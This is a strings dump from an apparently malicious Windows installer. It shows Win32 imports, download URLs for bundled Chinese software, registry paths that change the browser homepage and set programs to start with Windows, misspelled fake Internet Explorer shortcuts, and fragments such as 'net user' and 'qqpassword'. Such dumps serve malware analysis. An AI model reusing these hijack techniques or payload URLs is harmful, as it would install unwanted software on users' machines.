ADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXC:\Program Files\Common Files\Microsoft Shared\autoinstall.exe
AtlAxWinInit
atl.dll
ATL.DLL
Attempted to remove current directory
- Attempt to initialize the CRT more than once.
- Attempt to use MSIL code from this assembly during native code initialization
.?AUCThreadData@@
August
.?AUIMessageFilter@@
.?AUIUnknown@@
.?AV_AFX_BASE_MODULE_STATE@@
.?AV_AFX_CTL3D_STATE@@
.?AV_AFX_CTL3D_THREAD@@
.?AVAFX_MODULE_STATE@@
.?AVAFX_MODULE_THREAD_STATE@@
.?AV_AFX_OLE_STATE@@
.?AV_AFX_THREAD_STATE@@
.?AV_AFX_WIN_STATE@@
.?AVbad_alloc@std@@
.?AVbad_exception@std@@
.?AVCCmdTarget@@
.?AVCCmdUI@@
.?AVCCommonDialog@@
.?AVCDC@@
.?AVCDialog@@
.?AVCException@@
.?AVCGdiObject@@
.?AVCHandleMap@@
.?AVCMapPtrToPtr@@
.?AVCMemoryException@@
.?AVCMenu@@
.?AVCNoTrackObject@@
.?AVCNotSupportedException@@
.?AVCObject@@
.?AVCOleBusyDialog@@
.?AVCOleDialog@@
.?AVCOleMessageFilter@@
.?AVCResourceException@@
.?AVCSimpleException@@
.?AVCTempDC@@
.?AVCTempGdiObject@@
.?AVCTempMenu@@
.?AVCTempWnd@@
.?AVCTestCmdUI@@
.?AVCUserException@@
.?AVCWinApp@@
.?AVCWinThread@@
.?AVCWnd@@
.?AVexception@std@@
.?AVlength_error@std@@
.?AVlogic_error@std@@
.?AVout_of_range@std@@
.?AVtype_info@@
.?AVXMessageFilter@COleMessageFilter@@
Bad address
bad_alloc *
bad allocation
bad alloc exception thrown
bad exception
bad exception thrown
Bad file number
BaiduAnTray.exe
\BaiduAnUpdate.exe
  baiduSD
BaiduSdTray.exe
\BaiduSdUpdate.exe
BaseBlock
 Base Class Array'
 Base Class Descriptor at (
__based(
BBFFf;
**BCCxh1
BeginPaint
BitBlt
BitInput
BitInput *
blackmoon
BlackMoon RunTime Error:
Block device required
BlockHeader
BlueBox.exe
BlueSoftSetup_bsugqr.exe
Borland32
Borland C++ - Copyright 1999 Inprise Corporation
borlndmm
@Borlndmm@SysFreeMem$qqrpv
@Borlndmm@SysGetMem$qqri
@Borlndmm@SysReallocMem$qqrpvi
Broken pipe
CallNextHookEx
CallWindowProcA
Cannot run multiple instances of a DLL under WIN32s
C:\bdkv_install.log
C:\BlueSoftSetup.log
CCmdTarget
C,;C$s/
__cdecl
CDialog
C:\Documents and Settings\administrator\
C:\Documents and Settings\Administrator\
C:\Documents and Settings\Administrator\Application Data\360se6\Application\360se.exe
C:\Documents and Settings\Administrator\Application Data\360se6\Application\6.3.1.153\installer\setup.exe
C:\Documents and Settings\Administrator\Local Settings\Application Data\Kingsoft\WPS Office\9.1.0.4463\utility\uninst.exe
C:\Documents and Settings\Administrator\Local Settings\Temp\bluefiles
C:\Documents and Settings\All Users\
C:\DuDu\uninstall.exe
CException
CGdiObject
CharLowerA
CharLowerW
CharToOemA
CharToOemBuffA
CharUpperA
CharUpperW
CheckedValue
CheckMenuItem
CheckMenuRadioItem
Chrome=0
 Class Hierarchy Descriptor'
ClientToScreen
CloseHandle
ClosePrinter
__clrcall
     cls
CLSID\%1
CLSID\%1\AuxUserType\2
CLSID\%1\AuxUserType\3
CLSID\%1\DefaultExtension
CLSID\%1\DefaultIcon
CLSID\%1\DocObject
CLSID\%1\InprocHandler32
CLSID\%1\InProcServer32
CLSID\%1\Insertable
CLSID\%1\LocalServer32
CLSID\%1\MiscStatus
CLSID\%1\Printable
CLSID\%1\ProgID
CLSID\%1\Verb\0
CLSID\%1\Verb\1
CLSIDFromProgID
CLSIDFromString
CMapPtrToPtr
CmdExtract
CmdExtract *
CMemoryException
CNotSupportedException
CObject
CoCreateInstance
CoFreeUnusedLibraries
CoInitialize
COleBusyDialog
COleDialog
CombineRgn
combobox
COMCTL32.dll
COMCTL32.DLL
comdlg32.dll
CommandData
CommandData *
commctrl_DragListMsg
CompareStringA
CompareStringW
 Complete Object Locator'
[Config]
CONOUT$
`copy constructor closure'
CopyRect
CoRegisterMessageFilter
CoRevokeClassObject
CorExitProcess
CoUninitialize
___CPPdebugHook
C:\Program Files\2345Explorer
C:\Program Files\2345Explorer\Uninstall.exe
C:\Program Files\2345Pic
C:\Program Files\2345Pic\Uninstall.exe
C:\Program Files\91yGame\unins000.exe
C:\Program Files\ADSafe3\ADSafe.exe
C:\Program Files\ADSafe3\uninst.exe
C:\Program Files\ainqngz3.9\uninstall.exe
C:\Program Files\ainqngz4.7\uninstall.exe
C:\Program Files\Baidu\BaiduAn\2.1.0.1154\BaiduAnUpdate.exe
C:\Program Files\baidu\BaiduBrowser\baidubrowser.exe
C:\Program Files\Baidu\BaiduSd\1.8.0.1196\BaiduSdUpdate.exe
C:\Program Files\Baofeng\StormPlayer\Uninst.exe
C:\Program Files\BLDBaseService
C:\Program Files\BLDBaseService\uninst.exe
C:\Program Files\BlueBox
C:\Program Files\BlueBox\BlueBox.exe
C:\Program Files\BlueBox\uninst.exe
C:\Program Files\Common Files
C:\Program Files\Common Files\
C:\Program Files\Common Files\appers_7_1958.exe
C:\Program Files\Common Files\asdqw_3104-48740.exe
C:\Program Files\Common Files\asdqw_3104-48740.JPG
C:\Program Files\Common Files\baidu.exe
C:\Program Files\Common Files\bdsd_1454_7654_356.exe
C:\Program Files\Common Files\bdsd_1454_7654_5943.exe
C:\Program Files\Common Files\bdsd.exe
C:\Program Files\Common Files\bdsd.jpg
C:\Program Files\Common Files\bdws_1454_7654_5943.exe
C:\Program Files\Common Files\BlueInstaller_bsfjuq_57574_.exe
C:\Program Files\Common Files\BlueResource.bpk.exe
C:\Program Files\Common Files\gqbb24_mt1.exe
C:\Program Files\Common Files\gswb_1454_7654_356.exe
C:\Program Files\Common Files\gswb_1454_7654_356.jpg
C:\Program Files\Common Files\kt_b_80213.exe
C:\Program Files\Common Files\Microsoft Shared\2345pack.ini
C:\Program Files\Common Files\Microsoft Shared\2345.txt
C:\Program Files\Common Files\Microsoft Shared\acbbb.txt
C:\Program Files\Common Files\Microsoft Shared\appers.txt
C:\Program Files\Common Files\Microsoft Shared\dudukantu.txt
C:\Program Files\Common Files\Microsoft Shared\gqbb24_mt1.txt
C:\Program Files\Common Files\Microsoft Shared\p3_kbaidu888888_jg04OunlF483lZatm6Ir5_v14.7.1.exe
C:\Program Files\Common Files\Microsoft Shared\pp3_kbaidu888888_jg04OunlF483lZatm6Ir5_v14.7.1.exe
C:\Program Files\Common Files\Microsoft Shared\ppt.txt
C:\Program Files\Common Files\Microsoft Shared\setup_s1020.txt
C:\Program Files\Common Files\Microsoft Shared\setup_t10303.txt
C:\Program Files\Common Files\Microsoft Shared\tqrl.txt
C:\Program Files\Common Files\Microsoft Shared\YoudaoDict_silent3.txt
C:\Program Files\Common Files\OfficeAssist.0195.80.1054.exe
C:\Program Files\Common Files\qhse_7654_5943.exe
C:\Program Files\Common Files\qhse_7654_5943.jpg
C:\Program Files\Common Files\qq.exe
C:\Program Files\Common Files\setup_s1020.exe
C:\Program Files\Common Files\setup_t10303.exe
C:\Program Files\Common Files\shanhu_7654_356exe
C:\Program Files\Common Files\shanhu_7654_356.exe
C:\Program Files\Common Files\shanhu_7654_356.jpg
C:\Program Files\Common Files\td1.exe
C:\Program Files\Common Files\td.exe
C:\Program Files\Common Files\Tiandi_6733.exe
C:\Program Files\Common Files\tqrl_97_1957.exe
C:\Program Files\Common Files\YoudaoDict_silent3.exe
C:\Program Files\Doyo\DyUninstall.exe
C:\Program Files\GSInput\3.0.1.0512\uninst.exe
C:\Program Files\gssoft\gswb\2.8.1.1120\uninst.exe
C:\Program Files\HaoZip
C:\Program Files\HaoZip\Uninstall.exe
C:\Program Files\iQIYI\QiyiInstaller.exe
C:\Program Files\JJ
C:\Program Files\JSBrowser\JSBrowser.exe
C:\Program Files\kingsoft\kingsoft antivirus\uni0nst.exe
C:\Program Files\liebao\liebao.exe
C:\Program Files\p3_kbaidu888888_jg04OunlF483lZatm6Ir5_v14.7.1.exe
C:\Program Files\PPStream\unpps.exe
C:\Program Files\ShanHuInput\1.0.1.0930\SHUninst.exe
C:\Program Files\SogouExplorer\SogouExplorer.exe
C:\Program Files\Tencent\QQPCMgr\8.8.10756.232\Uninst.exe
C:\Program Files\UCBrowser\UCBrowser.exe
C:\Program Files\UCBrowser\UCBrowser.exe --wow-launch-from=desktop
C:\Program Files\UCBrowser\Uninstall.exe
C:\Program Files\yyfm0529\201407051412\Unins.exe
CreateBitmap
CreateCompatibleDC
CreateDialogIndirectParamA
CreateDIBSection
CreateDirectoryA
CreateDirectoryW
CreateEventA
CreateFileA
CreateFileW
CreateMenu
CreateMutexW
CreatePatternBrush
CreatePopupMenu
CreateProcessA
CreateRoundRectRgn
CreateShortcut
CreateSolidBrush
CreateThread
CreateToolhelp32Snapshot
CreateWaitableTimerA
CreateWindowExA
CResourceException
Cross-device link
- CRT not initialized
CryptAcquireContextA
CryptCreateHash
CryptDestroyHash
CryptGetHashParam
CryptHashData
CryptKeyCacheItem
CryptKeyCacheItem *
CryptKeyCacheItem[4]
CryptReleaseContext
CTempDC
CTempGdiObject
CTempMenu
CTempWnd
C:\user\All Users\
CUserException
C:\users\administrator\
C:\users\Administrator\
C:\users\Administrator\Application Data\360se6\Application\360se.exe
C:\users\Administrator\Application Data\360se6\Application\6.3.1.153\installer\setup.exe
C:\users\Administrator\Desktop\
C:\Users\Administrator\Desktop\
C:\Users\Administrator\Desktop\1.76
C:\Users\Administrator\Desktop\2345
C:\Users\Administrator\Desktop\Internet Exploror.lnk
C:\users\Administrator\Local Settings\Application Data\Kingsoft\WPS Office\9.1.0.4463\utility\uninst.exe
C:\users\Administrator\Local Settings\Temp\bluefiles
C:\users\All Users\
C:\users\All Users\Desktop\
C:\users\All Users\Desktop\ Intener Hao123.lnk
CWinApp
C:\WINDOWS\system32\taskmgr.exe
C:\WINDOWS\system32\unrar.dll
C:\WINDOWS\system\360se
C:\WINDOWS\system\360.txt
C:\WINDOWS\system\ADSafe
C:\Windows\system\APP
C:\Windows\system\APPP
C:\WINDOWS\system\baidusd2.txt
C:\WINDOWS\system\baiduse
C:\WINDOWS\system\leibao
@C:\WINDOWS\system\QQPC.txt
C:\WINDOWS\system\shanhu.txt
C:\WINDOWS\system\uc
CWinThread
|$|;|$d
; <d<|=
Daemon.exe
`.data
@.data
DataSet
DataSet *
D$`;D$\}
D$,;D$0u	
dddd, MMMM dd, yyyy
D$`;D$T
D$`;D$T|
December
DecodePointer
`default constructor closure'
DefMDIChildProcA
DefWindowProcA
DefWindowProcW
 delete
 delete[]
Delete
DeleteCriticalSection
DeleteDC
DeleteFileA
DeleteFileW
DeleteObject
Desk=0
DestroyCursor
DestroyIcon
DestroyMenu
DestroyWindow
DeviceIoControl
D$$ht=H
D$$hx=H
   dianxinshurufa
Directory not empty
DispatchMessageA
DISPLAY
DLL ERROR
DocumentPropertiesA
DOMAIN error
&;D$Pr
D:\Program Files\Tencent\QQPCMgr\8.12.11701.227\Uninst.exe
D:\Program Files\Tencent\QQPCMgr\8.8.10756.232\Uninst.exe
DragAcceptFiles
DragFinish
DragQueryFileA
DrawMenuBar
DrawTextA
D$<SUV
D$T;D$\|
D$Tj\P
;D$Tt\
   dudukantu
D$,WPQR
D$$WPV
D$XQRP
&;D$Xw
`dynamic atexit destructor for '
`dynamic initializer for '
@.edata
&Edit,0,2
e@FBC;u
`eh vector constructor iterator'
`eh vector copy constructor iterator'
`eh vector destructor iterator'
`eh vector vbase constructor iterator'
`eh vector vbase copy constructor iterator'
Embedded Object
Embed Source
EnableMenuItem
EnableWindow
EncodePointer
EndDialog
EndPaint
EnterCriticalSection
EnumDisplayMonitors
EnumThreadWindows
Error 0
Error: system code page access failure; MBCS table not initialized
Escape
Exec format error
Executable file in use
ExitProcess
Explorer=0
Explorer=1
ExtCreateRegion
ExtResource
ExtResource *
ExtTextOutA
F,_^][
@@f98u
f9z.vk
__fastcall
fb:C++HOOK
February
FFF))EE	FFFF))))))
File *
File already exists
FileHeader
FileName
FileNameW
FileTimeToLocalFileTime
FileTimeToSystemTime
File too large
FillRect
FindClose
FindFile
FindFile *
FindFirstFileA
FindFirstFileW
FindNextFileA
FindNextFileW
FindResourceA
FindWindowA
FindWindowExA
- floating point not loaded
- floating point support not loaded
FlsAlloc
FlsFree
FlsGetValue
FlsSetValue
FlushFileBuffers
FreeEnvironmentStringsA
FreeEnvironmentStringsW
FreeLibrary
Friday
frmProgress
GAIsProcessorFeaturePresent
gdi32.dll
GDI32.dll
GetACP
GetActiveWindow
GetAsyncKeyState
GetCapture
GetClassInfoA
GetClassLongA
GetClassNameA
GetClientRect
GetClipBox
GetCommandLineA
GetCommandLineW
GetConsoleCP
GetConsoleMode
GetConsoleOutputCP
GetCPInfo
GetCurrentProcess
GetCurrentProcessId
GetCurrentThread
GetCurrentThreadId
GetCursorPos
GetDateFormatA
GetDesktopWindow
GetDeviceCaps
GetDlgCtrlID
GetDlgItem
GetEnvironmentStrings
GetEnvironmentStringsW
GetEnvironmentVariableA
GetFileAttributesA
GetFileAttributesW
GetFileSize
GetFileTime
GetFileType
GetFocus
GetFolder
GetForegroundWindow
GetFullPathNameA
GetFullPathNameW
GetKeyState
GetLastActivePopup
GetLastError
GetLocaleInfoA
GetLocalTime
GetMenu
GetMenuCheckMarkDimensions
GetMenuDefaultItem
GetMenuInfo
GetMenuItemCount
GetMenuItemID
GetMenuItemInfoA
GetMenuItemRect
GetMenuState
GetMenuStringA
GetMessageA
GetMessagePos
GetMessageTime
GetModuleFileNameA
GetModuleFileNameW
GetModuleHandleA
GetMonitorInfoA
GetNativeSystemInfo
GetNextDlgTabItem
GetObjectA
GetOEMCP
GetParent
GetPrivateProfileStringW
GetProcAddress
GetProcessHeap
GetProcessVersion
GetProcessWindowStation
GetPropA
GetStartupInfoA
GetStartupInfoW
GetStdHandle
GetStockObject
GetStringTypeA
GetStringTypeW
GetSubMenu
GetSysColor
GetSysColorBrush
GetSystemDirectoryA
GetSystemMenu
GetSystemMetrics
GetSystemTimeAsFileTime
GetTempPathA
GetTickCount
GetTimeFormatA
GetTopWindow
GetUserDefaultLCID
GetUserNameA
GetUserObjectInformationA
GetVersion
GetVersionExA
GetWindow
GetWindowLongA
GetWindowPlacement
GetWindowRect
GetWindowsDirectoryA
GetWindowTextA
GetWindowTextLengthA
GetWindowThreadProcessId
GlobalAddAtomA
GlobalAlloc
GlobalDeleteAtom
GlobalFindAtomA
GlobalFlags
GlobalFree
GlobalGetAtomNameA
GlobalHandle
__GLOBAL_HEAP_SELECTED
GlobalLock
GlobalMemoryStatus
GlobalReAlloc
GlobalUnlock
Google Chrome
Google Chrome.lnk
GrayStringA
   guangqu
`h````
h4l4p4t4x4|4
\hao123
HaoZip=0
HaoZip=1
HeapAlloc
HeapCreate
HeapDestroy
HeapFree
HeapReAlloc
HeapSize
`h`hhh
HH:mm:ss
HHtpHHtl
_Hide.exe
HideProgress=0
HKEY_CLASSES_ROOT
HKEY_CURRENT_USER
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run
HKEY_CURRENT_USER\Software\Policies\Microsoft\Internet Explorer\Control Panel
HKEY_LOCAL_MACHINE
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\Hidden\SHOWALL
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\UCBrowserSvc
HKEY_USERS
H:mm:ss
%H:%M:%S
HomePage
hrdir_b.c: LoadLibrary != mmdll borlndmm failed
HSVHWtgHHtF
htmlfile\shell\
htmlfile\shell\e\command\
http://cdn.pcbeta.attachment.inimc.com/data/attachment/forum/201409/12/173937imav9yvcycn3akua.jpg
http://codown.youdao.com/cidian/YoudaoDict_silent3.exe
http://d3.freep.cn/3tb_140917191931o0a2538987.jpg
http://d3.freep.cn/3tb_140923192942q71f538987.jpg
http://d3.freep.cn/3tb_141007222757xfui539918.jpg
http://down.9vh.net/appers_7_1958.exe
http://down.qunasou.com/kt/kt_b_80213.exe
http://down.tianyunxj.com/tqrl_97_1957.exe
http://down.xiaoxinrili.com/hezi/jm/setup_t10303.exe
http://guangqu924.oss-cn-hangzhou.aliyuncs.com/gqbb24_mt1.exe
http://jifendownload.2345.cn/jifen_2345/p3_kbaidu888888_jg04OunlF483lZatm6Ir5_v14.7.1.exe
HttpQueryInfoA
HTTP\shell\
HTTP\shell\e\command\
https\shell\
https\shell\e\command\
http://wdl1.cache.wps.cn/wps/download/OfficeAssist.0195.80.1054.exe
http://www.2345.com/?k98792151
http://xz.dianxinshu.com/download/setup_s1020.exe
?(?H?T?X?h?
hWj@_;
H_^[Y]
_hypot
.idata
IEFav=0
IEFav=1
IEHome=0
IEHome=1
Illegal dtorMode in _vector_new_
Illegal mode in _vector_delete_
Illegal mode in _vector_new_
Illegal seek
Inappropriate I/O control operation
InitCommonControlsEx
InitializeCriticalSection
InitializeCriticalSectionAndSpinCount
Input/output error
InsertMenuA
\ Intener Hao123.lnk
InterlockedDecrement
InterlockedIncrement
InternetCloseHandle
Internet     Explorer.lnk
Internet    Explorer.lnk
\Internet Exploror.lnk
InternetOpenA
InternetOpenUrlA
InternetReadFile
InternetShortcut\shell\
InternetShortcut\shell\e\command\
Interrupted function call
Invalid access code
Invalid argument
InvalidateRect
Invalid data
Invalid environment
Invalid format
Invalid function number
Invalid memory block address
invalid string position
Is a directory
IsBadCodePtr
IsBadReadPtr
IsBadWritePtr
IsDBCSLeadByte
IsDebuggerPresent
IsDialogMessageA
IsIconic
IsValidCodePage
IsWindow
IsWindowEnabled
IsWindowVisible
IsZoomed
j8j ^V
JanFebMarAprMayJunJulAugSepOctNovDec
January
kernel32
KERNEL32
kernel32.dll
Kernel32.dll
KERNEL32.dll
KERNEL32.DLL
KillTimer
;k=o=s=w={=
?-?K?S?
KuGou=0
KuWo=0
L$0_^]
L$49l$4}
);l$8u
\$L9|$
LanguageResources
LanguageResources *
LCMapStringA
LCMapStringW
L$DWQV
LeaveCriticalSection
Link Source
Link Source Descriptor
;#<l<-<=<J<z<
L$\)L$T
LoadBitmapA
LoadCursorA
LoadIconA
LoadLibraryA
LoadMenuA
LoadResource
LoadStringA
LocalAlloc
LocalFileTimeToFileTime
LocalFree
LocalReAlloc
LocalSize
`local static guard'
`local static thread guard'
`local vftable'
`local vftable constructor closure'
LockResource
LookupPrivilegeValueA
L$$Phx
L$$PQh
L$<RPQ
L$,Shl=H
L$,Shp=H
lstrcatA
lstrcmpA
lstrcmpiA
lstrcpyA
lstrcpyn
lstrcpynA
lstrlenA
lstrlenW
l$ UPVQ
`managed vector constructor iterator'
`managed vector copy constructor iterator'
`managed vector destructor iterator'
MapWindowPoints
Math argument
%m/%d/%y
M/d/yy
Memory arena trashed
MenuItemFromPoint
MessageBoxA
mhtmlfile\shell\
mhtmlfile\shell\e\command\
Microsoft Visual C++ Runtime Library
.mixcrt
MM/dd/yy
ModelPPM
ModelPPM *
ModifyMenuA
Module32First
Monday
MonitorFromPoint
MonitorFromRect
MonitorFromWindow
MoveFileA
MoveFileExA
MoveWindow
Movie=0
@Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
mscoree.dll
MsgWaitForMultipleObjects
MS Sans Serif
MS Shell Dlg
__MSVCRT_HEAP_SELECT
MulDiv
MultiByteToWideChar
\MusicFM.lnk
M;Z4s+;Z,s
n0SSSSU
Native
net user 
 new[]
No child processes
No more files
no named exception thrown
Nonshared DATA segment required
No space for copy of command line
No space left on device
No such device
No such device or address
No such file or directory
No such process
Not a directory
Not enough memory
- not enough space for arguments
- not enough space for environment
- not enough space for locale information
- not enough space for lowio initialization
- not enough space for _onexit/atexit table
- not enough space for stdio initialization
- not enough space for thread data
Not same device
<notype>
November
NTDLL.DLL
NtReadVirtualMemory
(null)
Object Descriptor
ObjectLink
October
OemToCharA
OemToCharBuffA
OffsetViewportOrgEx
ole32.dll
OLEAUT32.dll
oledlg.dll
OleFlushClipboard
OleInitialize
OleIsCurrentClipboard
OLEPRO32.DLL
OleRun
OleUninitialize
`omni callsig'
&Open,0,2
OpenEventA
OpenFile
OpenPrinterA
OpenProcess
OpenProcessToken
Operation not permitted
operator
OwnerLink
__pascal
Path=C:\Program Files\
PathFileExistsA
PathFindFileNameA
PathMatchSpecA
Path not found
PathRemoveFileSpecA
.PAVCException@@
.PAVCMemoryException@@
.PAVCObject@@
.PAVCSimpleException@@
.PAVCUserException@@
PCMgr=0
PCMgr=1
PeekMessageA
Permission denied
Ph_^][Y
   pingguo
`placement delete closure'
`placement delete[] closure'
Please contact the application's support team for more information.
Possible deadlock
PostMessageA
PostQuitMessage
PostThreadMessageA
PPPPhd
PPPPPPPP
   PPT
ppxxxx
PreviewPages
printf : floating point formats not linked
Process32First
Process32Next
Program: 
program internal error number is %d. 
<program name unknown>
PtInRect
__ptr64
PtVisible
- pure virtual function call
PWVWWW
&qqpassword=  
QQPCTray.exe
QQSVWd
QQSVWh
QQSVWj
QSUVWj
QueryPerformanceCounter
QUVWRSPT
r<3r(3r
r<3r(3z
r<3z(3r(3z
r43r 3:3r
r43r 3r
r83r$3z
r83z$3r$3z
RaiseException
__rar_
RARCloseArchive
RARGetDllVersion
RAROpenArchive
RAROpenArchiveEx
RAROptions
RAROptions *
RARProcessFile
RARProcessFileW
RARReadHeader
RARReadHeaderEx
RARSetCallback
RARSetChangeVolProc
RARSetPassword
RARSetProcessDataProc
RarVM *
RawRead
RawRead *
 rbrbrb99
`.rdata
ReadFile
Read-only file system
ReadProcessMemory
RectVisible
REG_BINARY - 
RegCloseKey
RegCreateKeyA
RegCreateKeyExA
RegDeleteKeyA
RegDeleteValueA
RegDisableReflectionKey
REG_DWORD - DWORD
RegEnableReflectionKey
RegEnumKeyA
RegEnumValueA
RegFlushKey
RegisterClassA
RegisterClassExA
RegisterClipboardFormatA
RegisterHotKey
RegisterWindowMessageA
REG_MULTI_SZ - 
REG_NONE - 
RegOpenKeyA
RegOpenKeyExA
RegQueryValueExA
REG_REG_EXPAND_SZ - 
RegSetValueExA
REG_SZ - 
ReleaseDC
@.reloc
RemoveDirectoryA
RemoveMenu
RemovePropA
Resource busy
Resource temporarily unavailable
RestoreDC
__restrict
Result too large
RichEdit Text and Objects
Rich Text Format
RPWWWj
@.rsrc
RtlMoveMemory
RtlUnwind
rtmp%d
runtime error 
Runtime Error!
rwstderr
:"%s".
Safe=0
Saturday
SaveDC
SaveFilePos
SaveFilePos *
`scalar deleting destructor'
ScaleViewportExtEx
ScaleWindowExtEx
scanf : floating point formats not linked
ScreenToClient
scripting.FileSystemObject
SelectObject
SendDlgItemMessageA
SendMessageA
September
SeRestorePrivilege
SeSecurityPrivilege
SetActiveWindow
SetBkColor
SetClassLongA
SetConsoleCtrlHandler
SetCursor
SetEndOfFile
SetErrorMode
SetFileAttributesA
SetFileAttributesW
SetFilePointer
SetFileSecurityA
SetFileSecurityW
SetFileTime
SetFocus
SetForegroundWindow
SetHandleCount
SetLastError
SetMapMode
SetMenu
SetMenuDefaultItem
SetMenuInfo
SetMenuItemBitmaps
SetMenuItemInfoA
SetParent
SetPropA
SetRect
SetStdHandle
SetTextColor
SetTimer
Settings
SetUnhandledExceptionFilter
SetViewportExtEx
SetViewportOrgEx
SetWaitableTimer
SetWindowExtEx
SetWindowLongA
SetWindowPos
SetWindowRgn
SetWindowsHookExA
SetWindowTextA
?'?S?g?t?
shell32.dll
SHELL32.dll
ShellExecuteExW
Shell_NotifyIconA
Shell_TrayWnd
SHGetSpecialFolderPathA
shlwapi.dll
Shlwapi.dll
SHLWAPI.dll
ShowWindow
ShowWindowAsync
SIMULATE_TLS: A second thread was about to be created and the c0s32 startup code is in use
SING error
sO;>|C;~
software
Software\Microsoft\Internet Explorer\Main
SoHu=0
s[S;7|G;w
SS@SSPVSS
_SSSSU
Stack Overflow!
StartAuto=1
Start Page
std::bad_alloc
__stdcall
std::exception
StretchBlt
`string'
StringList
StringList *
string too long
SubAllocator
SubAllocator *
Sunday
SunMonTueWedThuFriSat
SusWnd
SysPager
System
SystemParametersInfoA
SystemRoot
\SystemRoot
SystemTimeToFileTime
T$0+L$8
t0WWWWW
t@_^]3
t7x7|7
t'9|$pt
t	9p$u
t^9(uZ
TabbedTextOutA
TargetPath
TaskbarCreated
taskmgr.exe
tb9} u
tD9_Pt?
tD9(u@
tehDL@
\TemporaryFile
\....\TemporaryFile
TerminateProcess
TextOutA
tfkL$@)
This application has requested the Runtime to terminate it in an unusual way.
__thiscall
This indicates a bug in your application.
This indicates a bug in your application. It is most likely the result of calling an MSIL-compiled (/clr) function from a native constructor or from DllMain.
!This program cannot be run in DOS mode.
This program must be run under Win32
t>Ht Ht
t+Ht$Ht
Thursday
   tianqi
t Kt<Kt[
TLOSS error
TlsAlloc
TlsFree
TlsGetValue
TlsSetValue
T$LURV
ToolbarWindow32
Too many links
Too many open files
tq9w(tlSj
tR99u2
TrackMouseEvent
TrackPopupMenu
TranslateAcceleratorA
TranslateMessage
TrayNotifyWnd
t#SSUP
T$(;T$,
+ttHHtd
t.;t$$t(
Tuesday
;t$,v-
t$$VSS
tvWWWWU
T$$WRV
t+WWVPV
 Type Descriptor'
`typeof'
uA;5<nH
`udt returning'
uL9=|+A
- unable to initialize heap
- unable to open console device
__unaligned
- unexpected heap error
- unexpected multithread lock error
UnhandledExceptionFilter
UnhookWindowsHookEx
\uninst.exe
Unknown error
Unknown exception
Unpack
Unpack *
UnpackFilter
UnpackFilter *
unrar.dll
UnregisterClassA
UnregisterHotKey
UpdateWindow
UQPXY]Y[
uRFGHt
URPQQhl
user32
USER32
user32.dll
User32.dll
USER32.dll
USER32.DLL
?UUUUUU
\$(UVW
ValidateRect
`vbase destructor'
`vbtable'
